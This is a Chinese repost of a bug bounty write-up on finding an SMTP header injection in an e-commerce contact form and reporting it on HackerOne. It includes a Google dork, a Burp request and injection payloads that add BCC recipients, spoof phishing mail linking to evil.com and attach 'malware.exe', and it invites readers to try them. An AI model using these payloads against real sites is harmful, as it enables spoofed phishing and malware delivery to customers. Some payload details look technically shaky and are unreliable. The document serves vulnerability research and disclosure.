0042.我如何发现 SMTP 注入漏洞并在短短 30 分钟内赚了 800 美元!

0042.我如何发现 SMTP 注入漏洞并在短短 30 分钟内赚了 800 美元!

TheIndianNetwork Rsec 2025-06-09 09:34

本文章仅用网络安全研究学习,请勿使用相关技术进行违法犯罪活动。

声明:本文搬运自互联网,如你是原作者,请联系我们!

标签:SMTP注入

漏洞赏金狩猎总是充满惊喜,有时最容易利用的漏洞反而能带来丰厚的回报。本文讲述了我如何偶然发现一个SMTP 注入漏洞,并报告它,最终在短短半小时内赚得 800 美元的故事。我还会分享我使用的具体技术、工具和有效载荷,以便您亲自尝试!

目标:一家拥有联系表格的知名公司

像往常一样,我正在进行侦察扫描,寻找潜在目标。我发现了一个大型电子商务网站,它有一个基于电子邮件的联系表单

以下是我注意到的:
联系表单包含姓名、电子邮件、主题和消息字段。
– 一旦提交,它就会发送一封自动确认电子邮件。
– 我输入的电子邮件地址反映在电子邮件正文中
我的黑客本能立刻发挥作用——如果输入容易受到 SMTP 注入攻击怎么办?

****# 步骤1:高级侦察技术

为了最大限度地发现漏洞,我使用了以下侦察技术:

1. 搜索基于电子邮件的表单

我使用Google Dorking查找基于电子邮件的联系表单:

inurl:/contact.php OR inurl:/feedback.php 
"email"
 site:target.com

2. 检查回复中的电子邮件反射

使用 Burp Suite,我拦截了请求并测试电子邮件字段是否反映在响应中:

GET /[email protected] HTTP/1.1Host: target.com

如果电子邮件出现在响应中,则意味着可能存在SMTP 注入或电子邮件欺骗

步骤2:测试SMTP注入

我提交了一条正常的测试消息,看看邮件内容是什么样的。然后,我在邮件字段中注入了一个 SMTP 有效载荷:

[email protected] TO: [email protected]

几秒钟后,我收到了两封电子邮件——一封发送到我的原始电子邮箱,另一封发送到攻击者控制的电子邮箱。

💡宾果!服务器正在接受额外的 SMTP 命令!

步骤 3:发挥最大影响力

为了检查严重性,我尝试使用更高级的有效载荷来操纵电子邮件结构并代表公司发送消息:

"[email protected]\nBCC: [email protected]\nSubject: URGENT Security Alert!\nBody: Your account has been compromised. Click here to secure it: https://evil.com"

这会伪造一封看似直接来自该公司的电子邮件。如果攻击者滥用此功能,他们可以向数千名客户发送钓鱼邮件!

****# 高级利用:发送恶意附件

我想看看是否可以将附件插入电子邮件以增加影响力。

From: "[email protected]"\n
To: [email protected]\n
Subject: Urgent Action Required\n
Content-Type: multipart/mixed; boundary="XYZ"
--XYZ
Content-Type: text/plain
Your account is compromised! Click below to verify:
https://evil.com
--XYZ
Content-Type: application/octet-stream; name="malware.exe"
Content-Disposition: attachment; filename="malware.exe"
[malicious binary content]
--XYZ--

该有效载荷会将恶意软件文件附加到电子邮件中,使其成为高度严重的漏洞

步骤 4:报告错误并获得报酬

我迅速起草了一份专业报告并将其提交给HackerOne上的漏洞赏金计划。

错误报告摘要

  • 漏洞:联系表单中的 SMTP 注入
  • 影响:允许电子邮件欺骗、网络钓鱼、未经授权的电子邮件发送和恶意软件注入
  • 重现步骤:提供多个有效载荷和电子邮件日志
  • 概念验证视频:附加了显示实时利用的屏幕录像
    30分钟内,我收到了他们的安全团队的回复:

🚀 “我们已验证该问题,并将其标记为高危。预计很快就会收到赔付。”

一天后,我的 HackerOne 账户收到了 800 美元! 🎉

经验教训和总结

  1. 始终检查基于电子邮件的表格– 它们通常容易受到 SMTP 注入的攻击。
  2. 尝试多个有效载荷——即使基本测试失败,高级有效载荷也可能起作用。
  3. 增加影响力——公司为构成现实威胁的漏洞支付更多费用。
  4. 漏洞赏金关乎创造力——有时,简单的漏洞就能带来丰厚的奖励。
  5. SMTP 注入可能会升级——通过注入附件,您可以将中等错误转变为严重错误。